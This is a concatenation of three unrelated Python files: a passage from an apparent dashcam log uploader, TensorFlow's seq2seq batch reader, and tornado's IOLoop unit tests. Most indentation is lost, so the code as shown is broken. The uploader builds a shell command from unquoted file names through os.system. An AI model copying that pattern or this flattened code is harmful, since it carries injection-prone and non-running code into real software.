result = re.findall(r"inet addr:((\d+\.){3}\d+)", result)[0][0]
is_android = result.startswith('192.168.43.')
is_ios = result.startswith('172.20.10.')
return (is_android or is_ios)
except:
return False
class Uploader(object):
def __init__(self, dongle_id, access_token, root):
self.dongle_id = dongle_id
self.access_token = access_token
self.root = root
self.upload_thread = None
self.last_resp = None
self.last_exc = None
def clean_dirs(self):
try:
for logname in os.listdir(self.root):
path = os.path.join(self.root, logname)
# remove empty directories
if not os.listdir(path):
os.rmdir(path)
except OSError:
cloudlog.exception("clean_dirs failed")
def gen_upload_files(self):
if not os.path.isdir(self.root):
return
for logname in listdir_by_creation_date(self.root):
path = os.path.join(self.root, logname)
names = os.listdir(path)
if any(name.endswith(".lock") for name in names):
continue
for name in names:
key = os.path.join(logname, name)
fn = os.path.join(path, name)
yield (name, key, fn)
def get_data_stats(self):
name_counts = Counter()
total_size = 0
for name, key, fn in self.gen_upload_files():
name_counts[name] += 1
total_size += os.stat(fn).st_size
return dict(name_counts), total_size
def next_file_to_compress(self):
for name, key, fn in self.gen_upload_files():
if name.endswith("log"):
return (key, fn, 0)
return None
def next_file_to_upload(self, with_video):
# try to upload log files first
for name, key, fn in self.gen_upload_files():
if name == "rlog.bz2":
return (key, fn, 0)
if with_video:
# then upload compressed rear and front camera files
for name, key, fn in self.gen_upload_files():
if name == "fcamera.hevc":
return (key, fn, 1)
elif name == "dcamera.hevc":
return (key, fn, 2)
# then upload other files
for name, key, fn in self.gen_upload_files():
if not name.endswith('.lock') and not name.endswith(".tmp"):
return (key, fn, 3)
return None
def do_upload(self, key, fn):
try:
url_resp = api_get("v1.2/"+self.dongle_id+"/upload_url/", timeout=2, path=key, access_token=self.access_token)
url_resp_json = json.loads(url_resp.text)
url = url_resp_json['url']
headers = url_resp_json['headers']
cloudlog.info("upload_url v1.2 %s %s", url, str(headers))
if fake_upload:
cloudlog.info("*** WARNING, THIS IS A FAKE UPLOAD TO %s ***" % url)
class FakeResponse(object):
def __init__(self):
self.status_code = 200
self.last_resp = FakeResponse()
else:
with open(fn, "rb") as f:
self.last_resp = requests.put(url, data=f, headers=headers, timeout=10)
except Exception as e:
self.last_exc = (e, traceback.format_exc())
raise
def normal_upload(self, key, fn):
self.last_resp = None
self.last_exc = None
try:
self.do_upload(key, fn)
except Exception:
pass
return self.last_resp
def killable_upload(self, key, fn):
self.last_resp = None
self.last_exc = None
self.upload_thread = threading.Thread(target=lambda: self.do_upload(key, fn))
self.upload_thread.start()
self.upload_thread.join()
self.upload_thread = None
return self.last_resp
def abort_upload(self):
thread = self.upload_thread
if thread is None:
return
if not thread.is_alive():
return
raise_on_thread(thread, SystemExit)
thread.join()
def compress(self, key, fn):
    # compress the log with bzip2, writing fn.bz2 and removing the original
if fn.endswith("log"):
ext = ".bz2"
cloudlog.info("compressing %r to %r", fn, fn+ext)
if os.system("nice -n 19 bzip2 -c %s > %s.tmp && mv %s.tmp %s%s && rm %s" % (fn, fn, fn, fn, ext, fn)) != 0:
cloudlog.exception("upload: bzip2 compression failed")
return False
# assuming file is named properly
key += ext
fn += ext
return (key, fn)
def upload(self, key, fn):
try:
sz = os.path.getsize(fn)
except OSError:
cloudlog.exception("upload: getsize failed")
return False
cloudlog.event("upload", key=key, fn=fn, sz=sz)
cloudlog.info("checking %r with size %r", key, sz)
if sz == 0:
# can't upload files of 0 size
os.unlink(fn) # delete the file
success = True
else:
cloudlog.info("uploading %r", fn)
# stat = self.killable_upload(key, fn)
stat = self.normal_upload(key, fn)
if stat is not None and stat.status_code in (200, 201):
cloudlog.event("upload_success", key=key, fn=fn, sz=sz)
os.unlink(fn) # delete the file
success = True
else:
cloudlog.event("upload_failed", stat=stat, exc=self.last_exc, key=key, fn=fn, sz=sz)
success = False
self.clean_dirs()
return success
def uploader_fn(exit_event):
cloudlog.info("uploader_fn")
params = Params()
dongle_id, access_token = params.get("DongleId"), params.get("AccessToken")
if dongle_id is None or access_token is None:
cloudlog.info("uploader MISSING DONGLE_ID or ACCESS_TOKEN")
raise Exception("uploader can't start without dongle id and access token")
uploader = Uploader(dongle_id, access_token, ROOT)
backoff = 0.1
while True:
allow_cellular = (params.get("IsUploadVideoOverCellularEnabled") != "0")
on_hotspot = is_on_hotspot()
on_wifi = is_on_wifi()
should_upload = allow_cellular or (on_wifi and not on_hotspot)
if exit_event.is_set():
return
d = uploader.next_file_to_compress()
if d is not None:
key, fn, _ = d
uploader.compress(key, fn)
continue
if not should_upload:
time.sleep(5)
continue
d = uploader.next_file_to_upload(with_video=True)
if d is None:
time.sleep(5)
continue
key, fn, _ = d
cloudlog.event("uploader_netcheck", allow_cellular=allow_cellular, is_on_hotspot=on_hotspot, is_on_wifi=on_wifi)
cloudlog.info("to upload %r", d)
success = uploader.upload(key, fn)
if success:
backoff = 0.1
else:
cloudlog.info("backoff %r", backoff)
time.sleep(backoff + random.uniform(0, backoff))
backoff = min(backoff*2, 120)
cloudlog.info("upload done, success=%r", success)
def main(gctx=None):
uploader_fn(threading.Event())
if __name__ == "__main__":
main()
|
batch_reader.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Batch reader to seq2seq attention model, with bucketing support."""
from collections import namedtuple
from random import shuffle
from threading import Thread
import time
import numpy as np
import six
from six.moves import queue as Queue
from six.moves import xrange
import tensorflow as tf
import data
ModelInput = namedtuple('ModelInput',
'enc_input dec_input target enc_len dec_len '
'origin_article origin_abstract')
BUCKET_CACHE_BATCH = 100
QUEUE_NUM_BATCH = 100
class Batcher(object):
"""Batch reader with shuffling and bucketing support."""
def __init__(self, data_path, vocab, hps,
article_key, abstract_key, max_article_sentences,
max_abstract_sentences, bucketing=True, truncate_input=False):
"""Batcher constructor.
Args:
data_path: tf.Example filepattern.
vocab: Vocabulary.
hps: Seq2SeqAttention model hyperparameters.
article_key: article feature key in tf.Example.
abstract_key: abstract feature key in tf.Example.
max_article_sentences: Max number of sentences used from article.
max_abstract_sentences: Max number of sentences used from abstract.
      bucketing: Whether to bucket articles of similar length into the same batch.
truncate_input: Whether to truncate input that is too long. Alternative is
to discard such examples.
"""
self._data_path = data_path
self._vocab = vocab
self._hps = hps
self._article_key = article_key
self._abstract_key = abstract_key
self._max_article_sentences = max_article_sentences
self._max_abstract_sentences = max_abstract_sentences
self._bucketing = bucketing
self._truncate_input = truncate_input
self._input_queue = Queue.Queue(QUEUE_NUM_BATCH * self._hps.batch_size)
self._bucket_input_queue = Queue.Queue(QUEUE_NUM_BATCH)
self._input_threads = []
for _ in xrange(16):
self._input_threads.append(Thread(target=self._FillInputQueue))
self._input_threads[-1].daemon = True
self._input_threads[-1].start()
self._bucketing_threads = []
for _ in xrange(4):
self._bucketing_threads.append(Thread(target=self._FillBucketInputQueue))
self._bucketing_threads[-1].daemon = True
self._bucketing_threads[-1].start()
self._watch_thread = Thread(target=self._WatchThreads)
self._watch_thread.daemon = True
self._watch_thread.start()
def NextBatch(self):
"""Returns a batch of inputs for seq2seq attention model.
Returns:
      enc_batch: A batch of encoder inputs [batch_size, hps.enc_timesteps].
      dec_batch: A batch of decoder inputs [batch_size, hps.dec_timesteps].
      target_batch: A batch of targets [batch_size, hps.dec_timesteps].
enc_input_len: encoder input lengths of the batch.
dec_input_len: decoder input lengths of the batch.
loss_weights: weights for loss function, 1 if not padded, 0 if padded.
origin_articles: original article words.
origin_abstracts: original abstract words.
"""
enc_batch = np.zeros(
(self._hps.batch_size, self._hps.enc_timesteps), dtype=np.int32)
enc_input_lens = np.zeros(
(self._hps.batch_size), dtype=np.int32)
dec_batch = np.zeros(
(self._hps.batch_size, self._hps.dec_timesteps), dtype=np.int32)
dec_output_lens = np.zeros(
(self._hps.batch_size), dtype=np.int32)
target_batch = np.zeros(
(self._hps.batch_size, self._hps.dec_timesteps), dtype=np.int32)
loss_weights = np.zeros(
(self._hps.batch_size, self._hps.dec_timesteps), dtype=np.float32)
origin_articles = ['None'] * self._hps.batch_size
origin_abstracts = ['None'] * self._hps.batch_size
buckets = self._bucket_input_queue.get()
for i in xrange(self._hps.batch_size):
(enc_inputs, dec_inputs, targets, enc_input_len, dec_output_len,
article, abstract) = buckets[i]
origin_articles[i] = article
origin_abstracts[i] = abstract
enc_input_lens[i] = enc_input_len
dec_output_lens[i] = dec_output_len
enc_batch[i, :] = enc_inputs[:]
dec_batch[i, :] = dec_inputs[:]
target_batch[i, :] = targets[:]
for j in xrange(dec_output_len):
loss_weights[i][j] = 1
return (enc_batch, dec_batch, target_batch, enc_input_lens, dec_output_lens,
loss_weights, origin_articles, origin_abstracts)
def _FillInputQueue(self):
"""Fill input queue with ModelInput."""
start_id = self._vocab.WordToId(data.SENTENCE_START)
end_id = self._vocab.WordToId(data.SENTENCE_END)
pad_id = self._vocab.WordToId(data.PAD_TOKEN)
input_gen = self._TextGenerator(data.ExampleGen(self._data_path))
while True:
(article, abstract) = six.next(input_gen)
article_sentences = [sent.strip() for sent in
data.ToSentences(article, include_token=False)]
abstract_sentences = [sent.strip() for sent in
data.ToSentences(abstract, include_token=False)]
enc_inputs = []
# Use the <s> as the <GO> symbol for decoder inputs.
dec_inputs = [start_id]
# Convert first N sentences to word IDs, stripping existing <s> and </s>.
for i in xrange(min(self._max_article_sentences,
len(article_sentences))):
enc_inputs += data.GetWordIds(article_sentences[i], self._vocab)
for i in xrange(min(self._max_abstract_sentences,
len(abstract_sentences))):
dec_inputs += data.GetWordIds(abstract_sentences[i], self._vocab)
# Filter out too-short input
if (len(enc_inputs) < self._hps.min_input_len or
len(dec_inputs) < self._hps.min_input_len):
tf.logging.warning('Drop an example - too short.\nenc:%d\ndec:%d',
len(enc_inputs), len(dec_inputs))
continue
# If we're not truncating input, throw out too-long input
if not self._truncate_input:
if (len(enc_inputs) > self._hps.enc_timesteps or
len(dec_inputs) > self._hps.dec_timesteps):
tf.logging.warning('Drop an example - too long.\nenc:%d\ndec:%d',
len(enc_inputs), len(dec_inputs))
continue
# If we are truncating input, do so if necessary
else:
if len(enc_inputs) > self._hps.enc_timesteps:
enc_inputs = enc_inputs[:self._hps.enc_timesteps]
if len(dec_inputs) > self._hps.dec_timesteps:
dec_inputs = dec_inputs[:self._hps.dec_timesteps]
# targets is dec_inputs without <s> at beginning, plus </s> at end
targets = dec_inputs[1:]
targets.append(end_id)
# Now len(enc_inputs) should be <= enc_timesteps, and
# len(targets) = len(dec_inputs) should be <= dec_timesteps
enc_input_len = len(enc_inputs)
dec_output_len = len(targets)
# Pad if necessary
while len(enc_inputs) < self._hps.enc_timesteps:
enc_inputs.append(pad_id)
while len(dec_inputs) < self._hps.dec_timesteps:
dec_inputs.append(end_id)
while len(targets) < self._hps.dec_timesteps:
targets.append(end_id)
element = ModelInput(enc_inputs, dec_inputs, targets, enc_input_len,
dec_output_len, ' '.join(article_sentences),
' '.join(abstract_sentences))
self._input_queue.put(element)
def _FillBucketInputQueue(self):
"""Fill bucketed batches into the bucket_input_queue."""
while True:
inputs = []
for _ in xrange(self._hps.batch_size * BUCKET_CACHE_BATCH):
inputs.append(self._input_queue.get())
if self._bucketing:
inputs = sorted(inputs, key=lambda inp: inp.enc_len)
batches = []
for i in xrange(0, len(inputs), self._hps.batch_size):
batches.append(inputs[i:i + self._hps.batch_size])
shuffle(batches)
for b in batches:
self._bucket_input_queue.put(b)
def _WatchThreads(self):
"""Watch the daemon input threads and restart if dead."""
while True:
time.sleep(60)
input_threads = []
for t in self._input_threads:
if t.is_alive():
input_threads.append(t)
else:
tf.logging.error('Found input thread dead.')
new_t = Thread(target=self._FillInputQueue)
input_threads.append(new_t)
input_threads[-1].daemon = True
input_threads[-1].start()
self._input_threads = input_threads
bucketing_threads = []
for t in self._bucketing_threads:
if t.is_alive():
bucketing_threads.append(t)
else:
tf.logging.error('Found bucketing thread dead.')
new_t = Thread(target=self._FillBucketInputQueue)
bucketing_threads.append(new_t)
bucketing_threads[-1].daemon = True
bucketing_threads[-1].start()
self._bucketing_threads = bucketing_threads
def _TextGenerator(self, example_gen):
"""Generates article and abstract text from tf.Example."""
while True:
e = six.next(example_gen)
try:
article_text = self._GetExFeatureText(e, self._article_key)
abstract_text = self._GetExFeatureText(e, self._abstract_key)
except ValueError:
tf.logging.error('Failed to get article or abstract from example')
continue
yield (article_text, abstract_text)
def _GetExFeatureText(self, ex, key):
"""Extract text for a feature from td.Example.
Args:
ex: tf.Example.
key: key of the feature to be extracted.
Returns:
      feature: the extracted feature text.
"""
return ex.features.feature[key].bytes_list.value[0]
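# A minimal usage sketch (hypothetical values; assumes a Vocab instance, an hps
# namedtuple providing batch_size/enc_timesteps/dec_timesteps/min_input_len, and
# tf.Example records matching the file pattern):
#
#   batcher = Batcher('data/train-*', vocab, hps,
#                     article_key='article', abstract_key='abstract',
#                     max_article_sentences=2, max_abstract_sentences=100,
#                     bucketing=True, truncate_input=False)
#   (enc_batch, dec_batch, target_batch, enc_lens, dec_lens,
#    loss_weights, articles, abstracts) = batcher.NextBatch()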
|
ioloop_test.py
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
import contextlib
import datetime
import functools
import socket
import sys
import threading
import time
import types
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError, PollIOLoop, PeriodicCallback
from tornado.log import app_log
from tornado.platform.select import _Select
from tornado.stack_context import ExceptionStackContext, StackContext, wrap, NullContext
from tornado.testing import AsyncTestCase, bind_unused_port, ExpectLog
from tornado.test.util import unittest, skipIfNonUnix, skipOnTravis, skipBefore35, exec_test
try:
from concurrent import futures
except ImportError:
futures = None
class FakeTimeSelect(_Select):
def __init__(self):
self._time = 1000
super(FakeTimeSelect, self).__init__()
def time(self):
return self._time
def sleep(self, t):
self._time += t
def poll(self, timeout):
events = super(FakeTimeSelect, self).poll(0)
if events:
return events
self._time += timeout
return []
class FakeTimeIOLoop(PollIOLoop):
"""IOLoop implementation with a fake and deterministic clock.
The clock advances as needed to trigger timeouts immediately.
For use when testing code that involves the passage of time
and no external dependencies.
"""
def initialize(self):
self.fts = FakeTimeSelect()
super(FakeTimeIOLoop, self).initialize(impl=self.fts,
time_func=self.fts.time)
def sleep(self, t):
"""Simulate a blocking sleep by advancing the clock."""
self.fts.sleep(t)
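# Quick illustration of the fake clock (illustrative only; the real use is in
# TestPeriodicCallback at the bottom of this file). Timeouts fire without real
# waiting because poll() simply advances the clock by the requested timeout:
#
#   loop = FakeTimeIOLoop()
#   loop.make_current()
#   loop.call_later(3600, loop.stop)  # would take an hour on a wall clock
#   loop.start()                      # returns almost immediately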
class TestIOLoop(AsyncTestCase):
def test_add_callback_return_sequence(self):
# A callback returning {} or [] shouldn't spin the CPU, see Issue #1803.
self.calls = 0
loop = self.io_loop
test = self
old_add_callback = loop.add_callback
def add_callback(self, callback, *args, **kwargs):
test.calls += 1
old_add_callback(callback, *args, **kwargs)
loop.add_callback = types.MethodType(add_callback, loop)
loop.add_callback(lambda: {})
loop.add_callback(lambda: [])
loop.add_timeout(datetime.timedelta(milliseconds=50), loop.stop)
loop.start()
self.assertLess(self.calls, 10)
@skipOnTravis
def test_add_callback_wakeup(self):
# Make sure that add_callback from inside a running IOLoop
# wakes up the IOLoop immediately instead of waiting for a timeout.
def callback():
self.called = True
self.stop()
def schedule_callback():
self.called = False
self.io_loop.add_callback(callback)
# Store away the time so we can check if we woke up immediately
self.start_time = time.time()
self.io_loop.add_timeout(self.io_loop.time(), schedule_callback)
self.wait()
self.assertAlmostEqual(time.time(), self.start_time, places=2)
self.assertTrue(self.called)
@skipOnTravis
def test_add_callback_wakeup_other_thread(self):
def target():
# sleep a bit to let the ioloop go into its poll loop
time.sleep(0.01)
self.stop_time = time.time()
self.io_loop.add_callback(self.stop)
thread = threading.Thread(target=target)
self.io_loop.add_callback(thread.start)
self.wait()
delta = time.time() - self.stop_time
self.assertLess(delta, 0.1)
thread.join()
def test_add_timeout_timedelta(self):
self.io_loop.add_timeout(datetime.timedelta(microseconds=1), self.stop)
self.wait()
def test_multiple_add(self):
sock, port = bind_unused_port()
try:
self.io_loop.add_handler(sock.fileno(), lambda fd, events: None,
IOLoop.READ)
# Attempting to add the same handler twice fails
# (with a platform-dependent exception)
self.assertRaises(Exception, self.io_loop.add_handler,
sock.fileno(), lambda fd, events: None,
IOLoop.READ)
finally:
self.io_loop.remove_handler(sock.fileno())
sock.close()
def test_remove_without_add(self):
        # remove_handler should not throw an exception if called on an fd
        # that was never added.
sock, port = bind_unused_port()
try:
self.io_loop.remove_handler(sock.fileno())
finally:
sock.close()
def test_add_callback_from_signal(self):
# cheat a little bit and just run this normally, since we can't
# easily simulate the races that happen with real signal handlers
self.io_loop.add_callback_from_signal(self.stop)
self.wait()
def test_add_callback_from_signal_other_thread(self):
# Very crude test, just to make sure that we cover this case.
# This also happens to be the first test where we run an IOLoop in
# a non-main thread.
other_ioloop = IOLoop()
thread = threading.Thread(target=other_ioloop.start)
thread.start()
other_ioloop.add_callback_from_signal(other_ioloop.stop)
thread.join()
other_ioloop.close()
def test_add_callback_while_closing(self):
# Issue #635: add_callback() should raise a clean exception
# if called while another thread is closing the IOLoop.
if IOLoop.configured_class().__name__.endswith('AsyncIOLoop'):
raise unittest.SkipTest("AsyncIOMainLoop shutdown not thread safe")
closing = threading.Event()
def target():
other_ioloop.add_callback(other_ioloop.stop)
other_ioloop.start()
closing.set()
other_ioloop.close(all_fds=True)
other_ioloop = IOLoop()
thread = threading.Thread(target=target)
thread.start()
closing.wait()
for i in range(1000):
try:
other_ioloop.add_callback(lambda: None)
except RuntimeError as e:
self.assertEqual("IOLoop is closing", str(e))
break
def test_handle_callback_exception(self):
# IOLoop.handle_callback_exception can be overridden to catch
# exceptions in callbacks.
def handle_callback_exception(callback):
self.assertIs(sys.exc_info()[0], ZeroDivisionError)
self.stop()
self.io_loop.handle_callback_exception = handle_callback_exception
with NullContext():
# remove the test StackContext that would see this uncaught
# exception as a test failure.
self.io_loop.add_callback(lambda: 1 / 0)
self.wait()
@skipIfNonUnix # just because socketpair is so convenient
def test_read_while_writeable(self):
# Ensure that write events don't come in while we're waiting for
# a read and haven't asked for writeability. (the reverse is
# difficult to test for)
client, server = socket.socketpair()
try:
def handler(fd, events):
self.assertEqual(events, IOLoop.READ)
self.stop()
self.io_loop.add_handler(client.fileno(), handler, IOLoop.READ)
self.io_loop.add_timeout(self.io_loop.time() + 0.01,
functools.partial(server.send, b'asdf'))
self.wait()
self.io_loop.remove_handler(client.fileno())
finally:
client.close()
server.close()
def test_remove_timeout_after_fire(self):
# It is not an error to call remove_timeout after it has run.
handle = self.io_loop.add_timeout(self.io_loop.time(), self.stop)
self.wait()
self.io_loop.remove_timeout(handle)
def test_remove_timeout_cleanup(self):
# Add and remove enough callbacks to trigger cleanup.
# Not a very thorough test, but it ensures that the cleanup code
# gets executed and doesn't blow up. This test is only really useful
# on PollIOLoop subclasses, but it should run silently on any
# implementation.
for i in range(2000):
timeout = self.io_loop.add_timeout(self.io_loop.time() + 3600,
lambda: None)
self.io_loop.remove_timeout(timeout)
# HACK: wait two IOLoop iterations for the GC to happen.
self.io_loop.add_callback(lambda: self.io_loop.add_callback(self.stop))
self.wait()
def test_remove_timeout_from_timeout(self):
calls = [False, False]
# Schedule several callbacks and wait for them all to come due at once.
# t2 should be cancelled by t1, even though it is already scheduled to
# be run before the ioloop even looks at it.
now = self.io_loop.time()
def t1():
calls[0] = True
self.io_loop.remove_timeout(t2_handle)
self.io_loop.add_timeout(now + 0.01, t1)
def t2():
calls[1] = True
t2_handle = self.io_loop.add_timeout(now + 0.02, t2)
self.io_loop.add_timeout(now + 0.03, self.stop)
time.sleep(0.03)
self.wait()
self.assertEqual(calls, [True, False])
def test_timeout_with_arguments(self):
# This tests that all the timeout methods pass through *args correctly.
results = []
self.io_loop.add_timeout(self.io_loop.time(), results.append, 1)
self.io_loop.add_timeout(datetime.timedelta(seconds=0),
results.append, 2)
self.io_loop.call_at(self.io_loop.time(), results.append, 3)
self.io_loop.call_later(0, results.append, 4)
self.io_loop.call_later(0, self.stop)
self.wait()
self.assertEqual(results, [1, 2, 3, 4])
def test_add_timeout_return(self):
# All the timeout methods return non-None handles that can be
# passed to remove_timeout.
handle = self.io_loop.add_timeout(self.io_loop.time(), lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_call_at_return(self):
handle = self.io_loop.call_at(self.io_loop.time(), lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_call_later_return(self):
handle = self.io_loop.call_later(0, lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_close_file_object(self):
"""When a file object is used instead of a numeric file descriptor,
the object should be closed (by IOLoop.close(all_fds=True),
not just the fd.
"""
# Use a socket since they are supported by IOLoop on all platforms.
# Unfortunately, sockets don't support the .closed attribute for
# inspecting their close status, so we must use a wrapper.
class SocketWrapper(object):
def __init__(self, sockobj):
self.sockobj = sockobj
self.closed = False
def fileno(self):
return self.sockobj.fileno()
def close(self):
self.closed = True
self.sockobj.close()
sockobj, port = bind_unused_port()
socket_wrapper = SocketWrapper(sockobj)
io_loop = IOLoop()
io_loop.add_handler(socket_wrapper, lambda fd, events: None,
IOLoop.READ)
io_loop.close(all_fds=True)
self.assertTrue(socket_wrapper.closed)
def test_handler_callback_file_object(self):
"""The handler callback receives the same fd object it passed in."""
server_sock, port = bind_unused_port()
fds = []
def handle_connection(fd, events):
fds.append(fd)
conn, addr = server_sock.accept()
conn.close()
self.stop()
self.io_loop.add_handler(server_sock, handle_connection, IOLoop.READ)
with contextlib.closing(socket.socket()) as client_sock:
client_sock.connect(('127.0.0.1', port))
self.wait()
self.io_loop.remove_handler(server_sock)
self.io_loop.add_handler(server_sock.fileno(), handle_connection,
IOLoop.READ)
with contextlib.closing(socket.socket()) as client_sock:
client_sock.connect(('127.0.0.1', port))
self.wait()
self.assertIs(fds[0], server_sock)
self.assertEqual(fds[1], server_sock.fileno())
self.io_loop.remove_handler(server_sock.fileno())
server_sock.close()
def test_mixed_fd_fileobj(self):
server_sock, port = bind_unused_port()
def f(fd, events):
pass
self.io_loop.add_handler(server_sock, f, IOLoop.READ)
with self.assertRaises(Exception):
# The exact error is unspecified - some implementations use
# IOError, others use ValueError.
self.io_loop.add_handler(server_sock.fileno(), f, IOLoop.READ)
self.io_loop.remove_handler(server_sock.fileno())
server_sock.close()
def test_reentrant(self):
"""Calling start() twice should raise an error, not deadlock."""
returned_from_start = [False]
got_exception = [False]
def callback():
try:
self.io_loop.start()
returned_from_start[0] = True
except Exception:
got_exception[0] = True
self.stop()
self.io_loop.add_callback(callback)
self.wait()
self.assertTrue(got_exception[0])
self.assertFalse(returned_from_start[0])
def test_exception_logging(self):
"""Uncaught exceptions get logged by the IOLoop."""
# Use a NullContext to keep the exception from being caught by
# AsyncTestCase.
with NullContext():
self.io_loop.add_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_exception_logging_future(self):
"""The IOLoop examines exceptions from Futures and logs them."""
with NullContext():
@gen.coroutine
def callback():
self.io_loop.add_callback(self.stop)
1 / 0
self.io_loop.add_callback(callback)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
@skipBefore35
def test_exception_logging_native_coro(self):
"""The IOLoop examines exceptions from awaitables and logs them."""
namespace = exec_test(globals(), locals(), """
async def callback():
self.io_loop.add_callback(self.stop)
1 / 0
""")
with NullContext():
self.io_loop.add_callback(namespace["callback"])
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_spawn_callback(self):
        # An added callback runs in the test's stack_context, so will be
        # re-raised in wait().
self.io_loop.add_callback(lambda: 1 / 0)
with self.assertRaises(ZeroDivisionError):
self.wait()
# A spawned callback is run directly on the IOLoop, so it will be
# logged without stopping the test.
self.io_loop.spawn_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
@skipIfNonUnix
def test_remove_handler_from_handler(self):
# Create two sockets with simultaneous read events.
client, server = socket.socketpair()
try:
client.send(b'abc')
server.send(b'abc')
# After reading from one fd, remove the other from the IOLoop.
chunks = []
def handle_read(fd, events):
chunks.append(fd.recv(1024))
if fd is client:
self.io_loop.remove_handler(server)
else:
self.io_loop.remove_handler(client)
self.io_loop.add_handler(client, handle_read, self.io_loop.READ)
self.io_loop.add_handler(server, handle_read, self.io_loop.READ)
self.io_loop.call_later(0.1, self.stop)
self.wait()
# Only one fd was read; the other was cleanly removed.
self.assertEqual(chunks, [b'abc'])
finally:
client.close()
server.close()
# Deliberately not a subclass of AsyncTestCase so the IOLoop isn't
# automatically set as current.
class TestIOLoopCurrent(unittest.TestCase):
def setUp(self):
self.io_loop = None
IOLoop.clear_current()
def tearDown(self):
if self.io_loop is not None:
self.io_loop.close()
def test_default_current(self):
self.io_loop = IOLoop()
# The first IOLoop with default arguments is made current.
self.assertIs(self.io_loop, IOLoop.current())
# A second IOLoop can be created but is not made current.
io_loop2 = IOLoop()
self.assertIs(self.io_loop, IOLoop.current())
io_loop2.close()
def test_non_current(self):
self.io_loop = IOLoop(make_current=False)
# The new IOLoop is not initially made current.
self.assertIsNone(IOLoop.current(instance=False))
# Starting the IOLoop makes it current, and stopping the loop
# makes it non-current. This process is repeatable.
for i in range(3):
def f():
self.current_io_loop = IOLoop.current()
self.io_loop.stop()
self.io_loop.add_callback(f)
self.io_loop.start()
self.assertIs(self.current_io_loop, self.io_loop)
# Now that the loop is stopped, it is no longer current.
self.assertIsNone(IOLoop.current(instance=False))
def test_force_current(self):
self.io_loop = IOLoop(make_current=True)
self.assertIs(self.io_loop, IOLoop.current())
with self.assertRaises(RuntimeError):
# A second make_current=True construction cannot succeed.
IOLoop(make_current=True)
# current() was not affected by the failed construction.
self.assertIs(self.io_loop, IOLoop.current())
class TestIOLoopAddCallback(AsyncTestCase):
def setUp(self):
super(TestIOLoopAddCallback, self).setUp()
self.active_contexts = []
def add_callback(self, callback, *args, **kwargs):
self.io_loop.add_callback(callback, *args, **kwargs)
@contextlib.contextmanager
def context(self, name):
self.active_contexts.append(name)
yield
self.assertEqual(self.active_contexts.pop(), name)
def test_pre_wrap(self):
# A pre-wrapped callback is run in the context in which it was
# wrapped, not when it was added to the IOLoop.
def f1():
self.assertIn('c1', self.active_contexts)
self.assertNotIn('c2', self.active_contexts)
self.stop()
with StackContext(functools.partial(self.context, 'c1')):
wrapped = wrap(f1)
with StackContext(functools.partial(self.context, 'c2')):
self.add_callback(wrapped)
self.wait()
def test_pre_wrap_with_args(self):
# Same as test_pre_wrap, but the function takes arguments.
# Implementation note: The function must not be wrapped in a
# functools.partial until after it has been passed through
# stack_context.wrap
def f1(foo, bar):
self.assertIn('c1', self.active_contexts)
self.assertNotIn('c2', self.active_contexts)
self.stop((foo, bar))
with StackContext(functools.partial(self.context, 'c1')):
wrapped = wrap(f1)
with StackContext(functools.partial(self.context, 'c2')):
self.add_callback(wrapped, 1, bar=2)
result = self.wait()
self.assertEqual(result, (1, 2))
class TestIOLoopAddCallbackFromSignal(TestIOLoopAddCallback):
# Repeat the add_callback tests using add_callback_from_signal
def add_callback(self, callback, *args, **kwargs):
self.io_loop.add_callback_from_signal(callback, *args, **kwargs)
@unittest.skipIf(futures is None, "futures module not present")
class TestIOLoopFutures(AsyncTestCase):
def test_add_future_threads(self):
with futures.ThreadPoolExecutor(1) as pool:
self.io_loop.add_future(pool.submit(lambda: None),
lambda future: self.stop(future))
future = self.wait()
self.assertTrue(future.done())
self.assertTrue(future.result() is None)
def test_add_future_stack_context(self):
ready = threading.Event()
def task():
# we must wait for the ioloop callback to be scheduled before
# the task completes to ensure that add_future adds the callback
# asynchronously (which is the scenario in which capturing
# the stack_context matters)
ready.wait(1)
assert ready.isSet(), "timed out"
raise Exception("worker")
def callback(future):
self.future = future
raise Exception("callback")
def handle_exception(typ, value, traceback):
self.exception = value
self.stop()
return True
# stack_context propagates to the ioloop callback, but the worker
# task just has its exceptions caught and saved in the Future.
with futures.ThreadPoolExecutor(1) as pool:
with ExceptionStackContext(handle_exception):
self.io_loop.add_future(pool.submit(task), callback)
ready.set()
self.wait()
self.assertEqual(self.exception.args[0], "callback")
self.assertEqual(self.future.exception().args[0], "worker")
class TestIOLoopRunSync(unittest.TestCase):
def setUp(self):
self.io_loop = IOLoop()
def tearDown(self):
self.io_loop.close()
def test_sync_result(self):
with self.assertRaises(gen.BadYieldError):
self.io_loop.run_sync(lambda: 42)
def test_sync_exception(self):
with self.assertRaises(ZeroDivisionError):
self.io_loop.run_sync(lambda: 1 / 0)
def test_async_result(self):
@gen.coroutine
def f():
yield gen.Task(self.io_loop.add_callback)
raise gen.Return(42)
self.assertEqual(self.io_loop.run_sync(f), 42)
def test_async_exception(self):
@gen.coroutine
def f():
yield gen.Task(self.io_loop.add_callback)
1 / 0
with self.assertRaises(ZeroDivisionError):
self.io_loop.run_sync(f)
def test_current(self):
def f():
self.assertIs(IOLoop.current(), self.io_loop)
self.io_loop.run_sync(f)
def test_timeout(self):
@gen.coroutine
def f():
yield gen.Task(self.io_loop.add_timeout, self.io_loop.time() + 1)
self.assertRaises(TimeoutError, self.io_loop.run_sync, f, timeout=0.01)
@skipBefore35
def test_native_coroutine(self):
namespace = exec_test(globals(), locals(), """
async def f():
await gen.Task(self.io_loop.add_callback)
""")
self.io_loop.run_sync(namespace['f'])
